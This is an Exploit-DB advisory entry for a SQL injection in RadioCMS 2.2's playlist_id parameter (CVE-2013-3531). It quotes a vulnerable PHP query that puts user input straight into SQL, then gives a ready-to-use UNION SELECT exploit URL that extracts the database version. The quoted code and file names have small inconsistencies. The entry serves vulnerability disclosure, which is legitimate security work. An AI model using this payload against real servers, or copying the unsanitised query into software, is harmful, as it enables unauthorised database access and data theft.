EXPLOITS

RadioCMS 2.2 - 'menager.php?playlist_id' SQL Injection

Author: Rooster(XEKA)
type: webapps
platform: php
port: 
date_added: 2013-05-26  
date_updated: 2013-05-26  
verified: 0  
codes: CVE-2013-3531;OSVDB-92088  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comRadioCMS.v.2.2.rar  

raw file: 25726.txt  

#################################################
+
+ Title: RadioCMS 2.2
+ Author: Rooster(XEKA)
+ Greetz to: Isis,luz3r,slider
+ Contact: forum.xeksec.com
+
#################################################

--[ Vuln Code ] --

...
if ($_GET['playlist_id']) {
  $playlist_id_get = ['playlist_id'];
}
...
if ($playlist_id != "") {
$query = "SELECT * FROM `playlist` WHERE $playlist_id;";
...


################################################

--[ Exploitable ]--

http://server/radio/meneger.php?fold=/var/www/music&search=1%27&playlist_id=&playlist_id=-1+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12

################################################